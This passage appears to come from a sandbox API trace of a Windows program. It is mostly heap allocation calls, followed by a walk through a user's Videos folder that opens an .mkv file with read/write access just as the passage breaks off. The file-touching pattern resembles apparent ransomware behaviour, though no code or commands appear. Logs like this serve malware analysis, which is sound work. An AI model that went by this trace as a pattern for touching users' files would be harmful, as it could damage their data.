hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.088] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.093] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\") returned="F72Mw_KNQRugYJJCcBc\\" [0196.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0196.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.094] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0196.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0196.094] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0196.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cce0 [0196.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.095] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0196.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cce0 | out: hHeap=0x6a0000) returned 1 [0196.096] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.096] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.097] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.097] PathFindFileNameW (pszPath="") returned="" [0196.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.097] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d6a1670, ftCreationTime.dwHighDateTime=0x1d8a095, ftLastAccessTime.dwLowDateTime=0x30c9b140, ftLastAccessTime.dwHighDateTime=0x1d8a21f, ftLastWriteTime.dwLowDateTime=0x30c9b140, ftLastWriteTime.dwHighDateTime=0x1d8a21f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.101] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d6a1670, ftCreationTime.dwHighDateTime=0x1d8a095, ftLastAccessTime.dwLowDateTime=0x30c9b140, ftLastAccessTime.dwHighDateTime=0x1d8a21f, ftLastWriteTime.dwLowDateTime=0x30c9b140, ftLastWriteTime.dwHighDateTime=0x1d8a21f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.101] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f02b6f0, ftCreationTime.dwHighDateTime=0x1d897ec, ftLastAccessTime.dwLowDateTime=0xca6ce790, ftLastAccessTime.dwHighDateTime=0x1d8a175, ftLastWriteTime.dwLowDateTime=0xca6ce790, ftLastWriteTime.dwHighDateTime=0x1d8a175, nFileSizeHigh=0x0, nFileSizeLow=0x112ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0iyDFpwaVsJADG.mkv", cAlternateFileName="0IYDFP~1.MKV")) returned 1 [0196.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2c70bc8 [0196.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2edf8 | out: hHeap=0x6a0000) returned 1 [0196.101] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\0iyDFpwaVsJADG.mkv") returned=".mkv" [0196.101] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\0iyDFpwaVsJADG.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\0iydfpwavsjadg.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.102] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=70378) returned 1 [0196.102] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, 